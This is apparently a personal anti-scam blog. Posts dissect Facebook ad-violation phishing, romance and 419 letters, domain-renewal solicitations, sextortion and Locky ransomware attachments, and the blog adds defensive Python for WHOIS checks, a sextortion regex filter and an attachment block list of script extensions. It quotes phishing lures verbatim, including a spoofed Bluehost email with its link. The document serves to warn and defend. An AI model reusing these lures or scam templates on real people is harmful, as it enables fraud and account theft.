August 16, 2023

Return of the Facebook Ad Violation Scam

On July 9, 2023, I published a blog article about a Facebook ad violation scam I received in my email inbox. After I reported the scam to SpamCop, the scam stopped for me, but not for another person I know. Evidently, my break is over and the scam arrived afresh in my inbox, on August 16, 2023.

Apparently, scammers are following me and other people who maintain Facebook business pages. When they, or their ad detection script, detect that I've boosted a post or created a new ad, they craft an email-borne phishing message targeting my page by its name. In the most recent scam email, the subject was: "Your ad account is currently inactive." The From field's display name was "Meta for Business". The body text contained dire warnings, including the following:

We regret to inform you that your Advertising account was used to create one or more Ads that do not comply with our Advertising Policies or Community standards.
...
Your account will be permanently deleted in the next 24 hours.

This was followed by a call to action:

To request a review, if you believe your account follows our Community Standards, please use the form below:

SUBMIT NOW

Now that I've stated the visible basics, let's take a look behind the scenes and see just what the Hell is going on!


July 9, 2023

Facebook Ads Scam

If you run ads, or pay to boost posts on your Facebook (business) pages, you may have received an email with a subject similar to these:


  • Your ad does not meet Facebook's advertising standards.

  • Your ad will be suspended and your ad account will be restricted

  • Your Ads Account Has Been Disabled Due To Violation Of Community Standards


The email claims to come from Meta Business, or Meta for Business, and that's what most email clients will show in the From field. What they are showing is the display name, which the sender types in freely; the actual sending address sits behind it, and expanding it is the first check to make before believing the name. The message body contains wording similar to this:

Hello, (your Facebook "page" name)

We officially inform you that your advertising account has been found in violatin our ads policies. We ensure to take the safety of our user seriously, and we request all advertisers to follow our guidelines.

We've decided to permanently restrict your account. If you think this decision is incorrect you can appeal below:

SUBMIT

After you request a reconsideration, you usually have to wait 48 hours to get a different decision. Before new results are available, your account will be in a "pending review" status.

The Meta for Business Team,

Meta Platforms, Inc., Attention: Community Support, 1 Facebook Way, Menlo Park, CA 54902


December 4, 2022

Nigerian romance scammers are targeting Facebook


For the last few months I have seen and reported many comments that have been posted on the timelines of female Facebook members. These comments are usually in response to some sad event mentioned by those members in posts they make on their timelines. This event might be a death notice about a relative, friend, workmate, or even a pet. Or, somebody may have posted about being sad, or brokenhearted because of a breakup, or some form of loss. If the post was made by a female Facebook user, in addition to replies from their friends, they may also receive a comment similar to the following, which I copied from a friend's post about pets crossing the Rainbow Bridge.

"Glen VanHerck: Honestly, I love your posts and shares, you seem kind and worth talking to. I hope you don't mind if we are friends? I tried sending you a friend request but it won't let me. I would love you to send me a friend request for a friendly chat, if you don't mind.."

This wording, and slight variations of it, comes from a template used by romance scammers who are often based in Nigeria. This come-on has been used over and over to lure unsuspecting women into replying to the scammers behind it. Anybody who becomes Facebook or Instagram friends with these people will be sweet-talked out of a lot of money.

If you went to that person's page you would find photos of a distinguished-looking US Air Force general who works at US Northern Command. The entire profile is fake and uses photos downloaded from publicly available military news publications. The scammer, or group of scammers, running this Facebook page created the profile as a lure to rope lonely women into a romance scam: they build trust with the victim, then begin asking for money for various reasons. I have a Facebook friend who has lost thousands of dollars to a similar scammer, who it turned out lives in Lagos, Nigeria.

If you are a female Facebook user and see a similarly worded comment under something you posted on your timeline, block that user and report the comment as Fraud or a Scam. Then delete that comment so your friends don't get curious and reply to the scammer.

Photos can be downloaded from the web and uploaded to a new Facebook profile, and the details about the person being impersonated are often publicly available. The scammers are professional confidence men. Once they gain a victim's confidence they drain that person's bank account by asking for payments in prepaid gift cards, MoneyGram, or Western Union, which are effectively untraceable and unrecoverable once sent and claimed by the scammers.

You can learn more about Nigerian Romance Scams on this Wikipedia page. If you know somebody who may have fallen for a romance scam, point them to this Wikipedia article.


December 2, 2022

TD Canada Trust 419 scam arrives in postal letters

November 28, 2022

On Monday, November 28, 2022, I fetched my mail and one letter caught my attention. It was a plain white envelope addressed to me by my name. The sender was simply the words "IBT ELECTION." It had a prepaid postmark from Canada Post, which is strange because I am in the USA. The enclosed letter was obviously printed from a scan on a black and white copy machine. The message it contained is what is known in the spam and scam trade as a Nigerian 419 scam. I will outline the gist of the letter below.

The upper left contained a black and white copy of a TD logo, followed by Canada Trust. It was dated November 22, 2022 and addressed me as "Dear (my name redacted)." The first paragraph was worded much like a typical Nigerian 419 scam going back to the early 2000s. It started off with this: "I am aware that this letter has come to you as a surprise as we have not met before or handled any business deal in the past. Nevertheless, I have contacted you with genuine intentions and I hope I can trust you with this inheritance opportunity which I explain below."

The second paragraph reads as follows:
"My name is MR. MATHIAS EDISON, an account manager with TD Canada Trust Bank, Ontario, Canada. I retrieved your contact address in my search for the next of kin to a deceased customer of our bank MR. GEO (redacted), a citizen of your country, who lived and died in London from Cardiac Arrest in the year 2012. Unfortunately, this customer died intestate leaving his bank account with an open beneficiary status." [snip]

It ends the paragraph with the hook:
"I would like to present you to our bank as his next of kin to claim this dormant account worth $9.2 Million USD (Nine Million Two Hundred Thousand US Dollars)." The rest of his story is octopus ink, meant to further rope in the reader and get them to respond to the email address at the end of the letter, where professional follow-up scammers go to work getting the victim to pay advance fees to cover imaginary processing charges and bribes, in the hope of splitting this huge sum with the scammers.

The signature at the bottom is:
Sincerely
Mr. Mathias Edison
[illegible handwritten signature]
Email: [email protected]

Inheritance and investment scams are favorites with the lads from Lagos. The advance-fee formula itself is centuries old: it goes back to the Spanish Prisoner letter scam of the late 1700s, around the time of the French Revolution, and lives on today as the Nigerian Prince scam. You can read up on the details and history of these Nigerian 419 advance fee fraud scams on this Wikipedia page. The number 419 refers to Section 419 of the Nigerian Criminal Code, which covers obtaining property by false pretenses, i.e., advance fee fraud.

In conclusion, there is no such dormant account. You are not the beneficiary. You are a mark, which the Nigerians sometimes call a mugu (fool). If you're reading this you probably got a similar letter, or perhaps a similar email. Don't fall for it. Keep tabs on your elderly friends and relatives and mention this to them so they don't get scammed.


December 29, 2021

Tis the season of Facebook and Messenger account impersonators

Beware of new Facebook Friend requests and Messenger message requests coming in the name of people you are already friends with on the platform. Many of these requests even use the same profile photo as your friend, but may not actually come from the account you are friends with.

First, let's acknowledge that there are valid reasons why a Facebook member might create a new account. For instance, they could have a new phone or computer and can't recover the logins from the old device for some valid reason. So, if that person sends friend requests to his previous friends it is probably not a scam (er, maybe). But, that person would be prudent to write a post explaining what happened in the new profile, or in Messenger messages.

But, let's get serious. Facebook accounts are juicy targets for scammers who copy user names, a photo and some details and create a fake, or clone account of somebody you know. They do this so they can scam that person's friends. Always check the member's profile before replying to an unexpected message request that says it is from a Facebook User, possibly with a new account, even if it has the profile photo that friend has been using. Just do a quick search for your friend's name then go to that friend's profile and see if they or their friends mention them possibly being "hacked." They usually have not been hacked, per se, but rather had their account cloned by an impersonator.

Hacked and cloned accounts are used to scam the victim's friends, either by sending them new Friend Requests from the fake profile the criminal controls, or via specially crafted messages in Facebook Messenger. The cloner can find those friends if your Friends List is viewable by other people or the public. If you want to make it harder for scammers and would-be account cloners to contact your friends, make your Friends list private and viewable only to yourself. To do this go to your account settings, then click or tap on Privacy. The Privacy section contains a setting labeled: Who can see your friends list? Set it to: Only Me. One caveat: this hides the list on your profile, but a friendship can still be seen on a friend's own profile if their list is public, so encourage your friends to do the same.


June 5, 2021

Domain Registry renewal pitch is back again


If you own Internet domain names, like example.com, you should know by now that they have to be renewed after your initial term expires. Some of you got your first year of domain registration for free when you signed up for web hosting. Others may have paid up front to register a domain for multiple years. After that initial term you should have received renewal notices from the domain registrar or hosting company, either telling you they were auto-renewing your domain name or asking you to update your payment information. Those notices would be sent to the email address on file with your domain registrar or web host. Failure to renew a domain will result in any websites (and email addresses) tied to it going offline shortly after it expires.

Let's stop at this point so I can define some of the terms I used in the first paragraph. You need to understand what they mean if you own, or want to buy domain names and have online websites.


  • A "Domain," in this context, is a digital asset (a registered name) that can be used to point to a website or other online presence, such as a file server, database, or social network.

  • A domain "name" is an alphanumeric name that somebody chooses for a website or other Internet-reachable asset. Some companies use domain names on internal networks, but that is outside the scope of this article. A domain name has at least two parts: the label you choose (the second-level domain) and the extension, or top-level domain (TLD). You pick an available label and pair it with the TLD you want. The classic example is "example.com." There are numerous TLDs, such as .com, .net, .info, .org, and so on.

  • A domain "Registrar" is a company whose business includes registering domain names on behalf of customers and submitting them to the registry that operates the TLD (the registry is the authoritative, worldwide database for that extension). Unless a registrar is accredited by ICANN, the body that licenses registrars, it is merely a reseller acting as a middleman for someone who is. Once a domain name is registered and entered into the registry, it cannot be registered to anybody else unless it expires and is not renewed.

  • A "Website" (a.k.a.: web site), in this context, is an online presence for a domain that has publicly or privately viewable content that is reached over the Internet. For the sake of clarity, I am referring to websites like mine: wizcrafts.net.

  • A "web host," or hosting company, is a business that operates large numbers of computers known as "servers," housed in climate-controlled data centers. They provide the storage, bandwidth, and software that let customers create websites and make them reachable over the Internet.

  • If you are reading this you know what the "Internet" is.

Moving along, last year I wrote a blog article about the Domain Registry (of America) registration renewal scam I got in the mail. Well, I just got another letter from this company, which mails from a Bergen Avenue address in Jersey City, New Jersey, notifying me that one of my domain names was about to expire and that I needed to renew it quickly to maintain its online presence. The fee they are asking for is $50 for one year or $90 for two years. Those rates are through the roof in today's domain registration market! I can renew a .com or .net domain for between $10 and $16 US dollars per year at Domain.com, or Cloudflare.

I went to the new website shown in the letter I got from them and they have dropped the words "of America," but the logo still contains Domain Registry next to a round portion of an American flag. They have a confusing double business name: "Global Internet Ventures" and "Internet Domain Name Services Inc." Nowhere on any of their few web pages is there any mention of them being accredited by ICANN. Any legitimate registrar will proudly display the ICANN Accredited logo, and, since a logo can be copied, you can confirm accreditation against the list of accredited registrars that ICANN publishes. It appears that Domain Registry, et al., is just a middleman for somebody else. Their exorbitant $50 price for registrations and renewals shows that they aren't trying to compete for your business on price. They get sales from the letters they mail to registered domain owners, trying to fool them into transferring to Domain Registry from their existing registrar (which is likely much lower priced in the first place). Keep in mind that a company that is not your registrar of record cannot renew your domain at all; the only thing paying them can accomplish is a transfer. They are hoping you are too busy to read the fine print, or to look up who your registrar actually is, and will pay through the nose for the privilege of being fleeced by DROA.

There is a funny twist to this story. It so happens that the domain name they wanted me to pay $50 to renew before it expires is already expired! It isn't assigned to me or anybody else. It went to the bit bucket in the sky! So much for doing their homework!

Now that you know the facts, if you own a domain that is coming up for renewal and wonder if you are paying too much, check out my Registrar: Domain.com. As for web hosting, I currently use InMotion Hosting.

I may receive a commission on sales generated through my affiliate links. This isn't a bad thing! It is a way to survive in a big dog little dog world.

Here's a heads up! No matter how many years you register your domains for at a time, it is imperative that you periodically log in to the registrar where they are registered and make sure that your contact info and email address are up to date. A lot of people lose their domain names because they failed to update their email address and never received the notice that the renewal date was approaching. Credit and debit cards typically expire every few years, so if you paid for a 5 or 10 year registration up front, the card on file may be outdated by the time renewal comes around. If you don't receive the email notices you will lose your domain when the due date passes without payment. If you don't know or remember who the registrar is, you can find out by doing a "Whois" lookup on the domain name (e.g., example.com); the record also shows the expiration date and whether the domain is locked against transfers.
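As an added example (not the author's code), here is a small Python script that parses a WHOIS record and checks a mailed "renewal notice" against it: who the registrar of record is, whether it carries an IANA accreditation ID, how many days remain, and whether the domain is locked against transfer. The WHOIS text, registrar name, IANA ID and dates are constructed for the example so that it runs offline; for real use, feed it the output of `whois example.com`.

```python
"""Check a mailed 'domain renewal notice' against the domain's WHOIS record.

Example code added to this article, not a registrar's tool.  SAMPLE_WHOIS is a
constructed record (fictional registrar, dates and IANA ID) so the script runs
offline; for real use, replace it with the output of `whois example.com`.
"""
import re
from datetime import datetime, timezone

SAMPLE_WHOIS = """\
Domain Name: EXAMPLE.COM
Registry Domain ID: 2336799_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.example-registrar.test
Registrar URL: http://www.example-registrar.test
Updated Date: 2021-01-15T09:12:00Z
Creation Date: 2001-06-05T00:00:00Z
Registry Expiry Date: 2021-10-05T00:00:00Z
Registrar: Example Registrar, LLC
Registrar IANA ID: 9999
Registrar Abuse Contact Email: abuse@example-registrar.test
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.EXAMPLE-HOST.TEST
"""

# "Today" for the worked example (constructed); use datetime.now(timezone.utc) live.
TODAY = datetime(2021, 6, 5, tzinfo=timezone.utc)

# Corporate suffixes ignored when comparing the letter's sender with the registrar.
SUFFIXES = {"llc", "inc", "ltd", "corp", "co", "company", "limited"}


def parse_whois(text: str) -> dict:
    """Extract the fields a domain owner needs from registry-style WHOIS text."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Za-z][A-Za-z /]+?):\s*(\S.*?)\s*$", line)
        if m:
            fields.setdefault(m.group(1), m.group(2))  # first occurrence wins
    expiry = (fields.get("Registry Expiry Date")
              or fields.get("Registrar Registration Expiration Date"))
    return {
        "domain": fields.get("Domain Name", "").lower(),
        "registrar": fields.get("Registrar", ""),
        # Accredited registrars carry an IANA ID; resellers and letter-mailers
        # do not appear in the record at all.
        "iana_id": fields.get("Registrar IANA ID", ""),
        "expiry": datetime.fromisoformat(expiry.replace("Z", "+00:00")) if expiry else None,
        # With this status set, nobody can transfer the name away until you unlock it.
        "transfer_locked": "clientTransferProhibited" in text,
    }


def normalize_name(name: str) -> str:
    words = re.sub(r"[^a-z0-9 ]", " ", name.lower()).split()
    return " ".join(w for w in words if w not in SUFFIXES)


def assess_notice(record: dict, notice_sender: str, today: datetime = TODAY) -> dict:
    """Decide whether a mailed notice can even be a renewal bill for this domain."""
    days_left = (record["expiry"] - today).days if record["expiry"] else None
    sender, registrar = normalize_name(notice_sender), normalize_name(record["registrar"])
    same_registrar = bool(sender) and (sender == registrar or sender in registrar)
    if same_registrar:
        verdict = "registrar of record: confirm by logging in to your account, not via the letter"
    else:
        verdict = "not your registrar: a transfer solicitation, no renewal is possible"
    return {
        "days_left": days_left,
        "same_registrar": same_registrar,
        "iana_id": record["iana_id"],
        "transfer_locked": record["transfer_locked"],
        "verdict": verdict,
    }


def run_demo() -> dict:
    """Worked example: the 'Domain Registry' letter against the sample record."""
    return assess_notice(parse_whois(SAMPLE_WHOIS), "Domain Registry")


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The name comparison is deliberately loose (suffixes such as LLC or Inc. are dropped) because registrars print their names inconsistently; the decisive signal is that the letter's sender does not appear in the record at all, while the real registrar does, with an IANA ID beside it.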

Finally, if you are new to all this and have a website that needs work, consider me as your Webmaster. See my Webmaster Services page for more details.

Thanks for your time.


September 3, 2020

Return of the Domain Registry renewal notice sales pitch


A few days ago I got a letter in the mail, addressed to "Domain Owner," from an outfit calling themselves Domain Registry, with a return address of 924 Bergen Ave, Suite #289, Jersey City, NJ 07306-3018. The address block also contained one of my registered domain names.

The envelope boldly proclaimed the following, in bold blue and red type: "Renewal Information Enclosed - OPEN IMMEDIATELY." Inside I found a letter headed, in large bold type, "Domain Name Expiration Notice." The letter told me that the named domain was due to expire in a couple of months and that I needed to renew it to maintain my exclusive rights to it and my "online identity." It went on to say that I could conveniently transfer the expiring domain to Domain Registry to save money with their "best savings" prices. Those prices were $50 for 1 year, $90 for 2 years and $190 for 5 years of registration. It also offered two optional domain name extensions, .net and .org, both listed at $90 for 2 years.

Domain owners who have had domains for a long time will remember getting these same scams from Domain Registry Of America. This is the same outfit just using a truncated business name. Further, their website url has changed to giv.com, which is short for Global Internet Ventures.


April 2, 2019

iDNS domain name registration scam hits again


This is about an ongoing domain registration scam that happened to be in my mailbox this morning. This is also not the first time I have received such a letter, which closely resembles an invoice, from iDNS, which, according to their letterhead, stands for Internet Domain Name Services.

The subject of the letter, composed in large bold type, is: Domain Name Expiration Notice. The text below it claims that "As a courtesy to domain name holders, we are sending you this notification of the domain name registration that is due to expire in the next few months. When you switch today to Internet Domain Name Services, you can take advantage of our best savings." It goes on to list one of my various domain names that comes up for renewal four months from now.

After that paragraph is a panic call to action, warning me that "now is the time to transfer and renew your name from your current Registrar to Internet Domain Name Services." Then, I am warned that "Failure to renew your domain name by the expiration date may result in a loss of your online identity making it difficult for your customers and friends to locate you on the Web."

A little further down the page is a rate chart that lists my .com domain and offers to renew it for - wait for it - $50 for one year!

Now, let's look at some facts that will take the hot air out of this scam.


March 11, 2019

A simple spam filter for the current Sextortion scams making the rounds


For a week or so, an email scam has been making the rounds claiming that a hacker has compromised your computer and caught you doing nasty things with yourself while watching porn videos online. He or she threatens to expose you (no pun intended) unless you pay a ransom of between $1000 and $2000 US in Bitcoin.

While this may cause some people to panic and pay up, most will see it for what it really is: a pathetic sextortion scam. Nobody hacked your computer or planted a video watching virus on it. This is FUD (Fear, Uncertainty and Doubt). But, because these scams are arriving in huge numbers, to multiple mailboxes, it is worth our time to create an email spam filter that detects and even auto-deletes these messages.

This article is mainly presented for MailWasher Pro users, but can also apply to any other email client that allows users to create spam filters from email headers. Think web server email systems...

If you don't use MailWasher Pro, but want to create this spam filter for another email client, or on your website's email server, read these articles I wrote in 2017:


  1. Use RegEx to filter spam from your mail server - part 1

  2. Use RegEx to filter spam from your mail server - part 2


Assuming your email client is MailWasher Pro, or otherwise allows custom Regular Expression filters, let's create a Sextortion Scam filter.
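The filter itself, as an added example in Python rather than MailWasher's own syntax (this is not the author's filter): each regular expression can be copied into any client or server filter that accepts regexes, and the weighted scoring shows why a single pattern is not enough. The two sample messages are constructed; the Bitcoin address in the scam sample is a syntactically plausible dummy, not a real wallet.

```python
"""Sextortion scam filter: weighted regular expressions plus a Bitcoin address check.

Example code added to this article, not the author's MailWasher Pro filter.  The
patterns can be pasted into any regex-capable filter; the two sample messages and
the Bitcoin address in them are constructed for the example.
"""
import re

# Bitcoin address formats: legacy base58 (starts with 1 or 3, never 0/O/I/l) and bech32.
BTC_ADDRESS = re.compile(
    r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})\b")

# Phrases the templates reuse, each with a weight.  re.S lets '.{0,40}' cross lines.
PHRASES = [
    (re.compile(r"\b(?:hacked|infected|compromised)\b.{0,40}\b(?:computer|device|pc|system)\b", re.I | re.S), 2),
    (re.compile(r"\b(?:adult|porn|xxx)\b", re.I), 1),
    (re.compile(r"\bweb\s?cam(?:era)?\b", re.I), 1),
    (re.compile(r"\b(?:video|recording)\b.{0,30}\b(?:you|yourself)\b", re.I | re.S), 1),
    (re.compile(r"\b(?:send|forward|share)\b.{0,40}\b(?:contacts?|friends|family|colleagues)\b", re.I | re.S), 2),
    (re.compile(r"\b(?:24|48|72)\s?hours?\b", re.I), 1),
    (re.compile(r"\$\s?\d{3,5}\b|\b\d{3,5}\s?(?:usd|dollars)\b", re.I), 1),
    (re.compile(r"\bbitcoin\b|\bbtc\b", re.I), 1),
]
THRESHOLD = 5  # a legitimate IT memo or newsletter rarely reaches this


def score_message(subject: str, body: str):
    """Return (score, matched labels) for one message."""
    text = f"{subject}\n{body}"
    score, hits = 0, []
    for pattern, weight in PHRASES:
        if pattern.search(text):
            score += weight
            hits.append(pattern.pattern)
    if BTC_ADDRESS.search(text):  # the payment address is the strongest single signal
        score += 3
        hits.append("btc_address")
    return score, hits


def is_sextortion(subject: str, body: str, threshold: int = THRESHOLD) -> bool:
    return score_message(subject, body)[0] >= threshold


# Constructed samples (the address is a dummy in the right format, not a real wallet).
SCAM_SUBJECT = "Your account was hacked"
SCAM_BODY = (
    "I hacked your device while you visited an adult site. My malware turned on your "
    "webcam and made a video of you. I will send it to all your contacts unless you pay "
    "$1500 in Bitcoin to 1DemoAddrForTestingXYZ123456789abc within 48 hours."
)
LEGIT_SUBJECT = "Webcam for the Friday meeting"
LEGIT_BODY = "Hi, can you bring the spare webcam? The video from last week was fine. Thanks."

if __name__ == "__main__":
    for subj, body in ((SCAM_SUBJECT, SCAM_BODY), (LEGIT_SUBJECT, LEGIT_BODY)):
        score, _ = score_message(subj, body)
        print(f"{subj!r}: score {score}, {'sextortion' if is_sextortion(subj, body) else 'ok'}")
```

Scoring rather than matching on one phrase is what keeps a colleague's "can you bring the webcam" out of the spam folder: the legitimate sample scores 1, the scam scores well above the threshold, and the Bitcoin address alone is worth more than any single phrase because no legitimate mail from a stranger contains one.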


November 27, 2018

Were you really hacked, or is it just another Facebook hoax?


Have you received the following message on your Facebook Messenger?

"Hi....I actually got another friend request from you yesterday...which I ignored so you may want to check your account. Hold your finger on the message until the forward button appears...then hit forward and all the people you want to forward too....I had to do the people individually. Good Luck!"

If you did and felt panicked, worried, or otherwise compelled to forward the message to some or all of your friends, you were pranked. This is a known Internet hoax. It first made the rounds on Facebook in October, 2018, one month before the latest circulation.

Hoaxes like this make the rounds on social networks every month or so. They are created by teenagers, or other silly people who never grew up, who turn their hoaxes loose on their friends to see how fast and far they can spread. I call these shits-and-giggles hoaxes. These Facebook chain letter hoaxes are like kids playing Tag, You're It.

What gives this away as a hoax?
The person sending it to you didn't compose the message. They forwarded it after receiving it from one of their Facebook friends. The same exact message is being sent by thousands of members right now as I type this. If you see other people talking about receiving the same message, it is likely a chain letter hoax.

The message claims that you sent another friend request to the person contacting you on Messenger, "yesterday." They claim they ignored it. But now they are telling you about it, but haven't mentioned your name; they just said "Hi." In effect, they are claiming that your account has been hacked.

They ask you to hold your finger down until the forward button appears. But, most computer users don't have a touch screen. The person who created this message was using a smartphone or tablet that used touch rather than mouse actions. The entire hoax is basically targeting handheld device users.

Last, they suggest that you forward the very same message they sent to you, as is, to as many of your friends as you want, which is usually everyone on your friends list. Did you read the first line of the message? It claims that "you" sent another friend request to them. If you forward this hoax you are telling your friends that you received another friend request from each of them! This doesn't make sense unless you actually did receive another friend request from all of these friends. Your friends who actually take a minute to read every word will either think that you are telling them that their account has been cloned/hacked, or you are mistaking them for someone else, or that you have been taken in by a hoax (which is what actually happened).

If this was an actual alert from a friend about your account being cloned, wouldn't you rather tell your friends in a post on your timeline where all your friends can read it? You could then ask your friends to go to that fake profile and report it as a scam page that is claiming to be somebody that they know.

After receiving a few of these messages you and your friends should realize that it is a chain letter hoax. It's time to grow up and stop falling for and participating in chain letter hoaxes.

The bottom line is that if you do actually receive a second friend request from an existing Facebook friend, tell them about it in a private message, or call them on the phone. Some members have the habit of losing access to their accounts (forgot their password, lost the device that had the account, the old account was deactivated for some infraction, or by choice, etc.) and create new accounts. But if you didn't actually receive another friend request from one or more of your friends, please don't forward chain letter messages claiming that they did send the request!


May 8, 2017

Another Pump and Dump scam bites the dust (QSMG)


Just when you thought that all the gullible people had wised up, another pump and dump email scam emerged on April 11, 2017. This one was pumping an OTC Pink Sheets stock with the ticker symbol QSMG. The company behind that symbol is Quest Management, Inc., which was based in Latvia at the time of this writing.

Quest Management lists its company profile as the following:


Quest Management, Inc. engages in the development of marketing channels to distribute fitness equipment products to wholesalers online. The company was founded on October 12, 2014 and is headquartered in Malta, Latvia.

Keep this in mind as you read the details of the failed pump and dump scam that just finished its disastrous run during the first week in May, 2017.

Eight days before the pump campaign began, on April 3, 2017, QSMG stock was worth $1.05 per share. One week later, the company issued a press release about its intent to purchase a little-known biotech company, and the stock soared to $2.33 on April 13. Remember, QSMG deals in fitness equipment, not medicine. Somebody, or a group of people, conspired to blow that announcement way out of proportion via fake news in a huge email spam blast that began on the morning of April 11, 2017. The details will fascinate you as you delve into the twisted minds of pump and dump scammers and their fake news writing techniques.


November 12, 2016

A flood of Ransomware in email attachments in early November 2016


Since the first week of November there has been a virtual flood of malicious email campaigns carrying ransomware downloaders in both .doc and .zip attachments.

The subjects vary from hour to hour and day to day. They include all of the following Subjects (with more to come):


  1. Emailing: _[digits]_[more digits]

  2. Virtual card

  3. Order

  4. "No subject"

  5. [Scan] 2016-1111 11:45:05 (time and date varies)

  6. Document from Paulette (name varies)

  7. Receipt 6940-30676 (numbers vary)

  8. unauthorized access

  9. DSCF54499.pdf (numbers vary and is really a zip file)

  10. DSCF54499.tiff (numbers vary and is really a zip file)

  11. DSCF54499.gif (numbers vary and is really a zip file)

  12. Account temporarily suspended

  13. Your Amazon.com order has dispatched (#890-6219873-3176850) (numbers vary)

  14. Your parcel has arrived

  15. Statement

  16. Suspicious movements

  17. We could not deliver your parcel, #0000331783 (numbers vary)

  18. Financial documents


The sizes of these messages vary from about 3 kB up to about 15 kB for the zip files, and over 200 kB for Office documents, which contain a diversionary document that opens while the Trojan is downloaded in the background. The most common sizes range from 10.5 to 12.5 kB for the zip files.

Some of these scams contain specially crafted wording to try to trick busy office workers to open the attachments. Others had nothing visible, other than the paperclip indicating that there was an attachment.

All of these attachments contain either JavaScript (.js) or Windows Script File (.wsf) scripts inside a zip file, or VBA macros inside a .doc file (a plain .docx cannot carry macros; the macro-enabled variant is .docm), whose job is to download and run a Trojan Horse known as the Locky ransomware. An unprotected Windows computer can be infected by unzipping the archive and double-clicking the extracted script, which Windows hands to the Windows Script Host, or by enabling macros in MS Word or in any other .doc reader that runs the Word macro language.
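An added example (not from the article or any product) of the check that catches the "DSCF54499.pdf that is really a zip" lure: identify the attachment by its leading bytes rather than its extension, and look inside archives for script files or a VBA project. The sample attachment is built in memory from a harmless one-line .js placeholder, so nothing malicious is involved; the extension lists are the ones I would start a mail-gateway policy with, not a complete catalogue.

```python
"""Trust the bytes, not the filename: inspect an e-mail attachment like the
'DSCF54499.pdf that is really a zip' lures listed above.

Example code added to this article, not from it or from any product.  The sample
attachment is built in memory from a harmless one-line .js placeholder.
"""
import io
import zipfile

# Leading bytes of formats these lures claim to be, or actually are.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"%PDF-": "pdf",
    b"II*\x00": "tiff",
    b"MM\x00*": "tiff",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",  # legacy .doc/.xls container
}
SCRIPT_EXTENSIONS = {".js", ".jse", ".wsf", ".wsh", ".vbs", ".vbe", ".hta",
                     ".cmd", ".bat", ".ps1", ".scr", ".exe", ".lnk"}
# Zip-based formats that legitimately start with 'PK': an extension mismatch is
# only suspicious when the claimed type is not one of these.
ZIP_BASED = {".zip", ".docx", ".docm", ".dotx", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}
# Formats that can carry VBA macros.  Plain .docx cannot; .docm and legacy .doc can.
MACRO_CAPABLE = {".doc", ".dot", ".docm", ".dotm", ".xls", ".xlt", ".xlsm", ".ppt", ".pptm"}


def sniff_type(data: bytes) -> str:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def extension_of(name: str) -> str:
    return "." + name.rsplit(".", 1)[1].lower() if "." in name else ""


def analyse_attachment(filename: str, data: bytes) -> dict:
    """Return what the file claims to be, what it is, and why it should be blocked."""
    ext, kind = extension_of(filename), sniff_type(data)
    findings = []
    if kind == "zip" and ext not in ZIP_BASED:
        findings.append(("block", f"named {ext or 'no extension'} but the bytes are a zip archive"))
    if ext in SCRIPT_EXTENSIONS:
        findings.append(("block", f"bare script/executable attachment {ext}"))
    if kind == "ole2" or ext in MACRO_CAPABLE:
        findings.append(("review", "Office file that can carry VBA macros; open only with macros disabled"))
    members = []
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                members.append(info.filename)
                if extension_of(info.filename) in SCRIPT_EXTENSIONS:
                    findings.append(("block", f"archive contains script/executable: {info.filename}"))
                elif info.filename.endswith("vbaProject.bin"):
                    findings.append(("review", "OOXML document contains a VBA project"))
    levels = {level for level, _ in findings}
    verdict = "block" if "block" in levels else ("review" if "review" in levels else "allow")
    return {"claimed": ext, "actual": kind, "members": members,
            "findings": [msg for _, msg in findings], "verdict": verdict}


def build_sample_lure() -> bytes:
    """Constructed sample: a zip whose only member is a .js stub, named like the lures."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("DSCF54499.js", "// placeholder; the real lure downloads a payload\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(analyse_attachment("DSCF54499.pdf", build_sample_lure()))
```

A .docx is itself a zip, which is why the mismatch check consults ZIP_BASED before complaining; the same listing of archive members that exposes a .js inside a "photo" also exposes a vbaProject.bin inside a macro document.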

I want to point out that if you use Trend Micro Internet Security (any flavor), you are protected against these scams and Ransomware threats. I use Trend Micro and pay by the year. I feel it is well worth the money for the peace of mind.


February 2, 2015

Spear Phishing spam is targeting Bluehost customers


Prologue
This article is about what is known in the spam fighting trade as a "spear phishing" scam. That means that the message has been custom researched and written to target a particular person by name, whom the spammers deem to be important to their evil goals. While my experience deals with Bluehost, if you own a website hosted by another major web hosting company, you may receive a similar email scam message.

The email in question was lingering in the Spam folder of my Gmail account. This is just E Pluribus Unum of the email accounts I use. When I first read the Subject and From lines I thought it might possibly be a legitimate message that got sent to the Spam folder by accident. I was wrong and Gmail was right!

I actually first saw the scam email on my Android smartphone. Although it seemed mildly plausible, some things about the body text aroused my suspicion and raised my bullshit detectors to full height. I will post the contents in my extended content and explain each item that should arouse your suspicion if you receive a similar email message.

The Hook:
From: Bluehost <[email protected]>
Subject: Status Alert: Code: 2502

Body text:


Dear Valued Bluehost Customer (My actual first and last names here!).<!--bhuzxuwtbw-->

Your account contains more than 9191 directories and may pose a potential performance risk to the server.
Please reduce the number of directories for your account to prevent possible account deactivation.

In order to prevent your account from being locked out we <special> recommend that you create special</special> tmp directory.

Or use the link below:

https://my.bluehost.com/tmp.php?doit=dfc7defac6624a80f02b02e22b14e8fd

Thank you,
Bluehost
Toll Free: (888) 401-4678
Outside US: 1 (801) 765-9400

If you viewed an email message like that on your phone you would see the blue underlined link text that appears to point to an account on Bluehost.com. Desktop users viewing this message in their browser or email client can simply hover their mouse pointer over links in email messages and the actual URL will be displayed in a status bar at the bottom of the window. On a phone, a long press on the link usually shows the real destination without opening it.
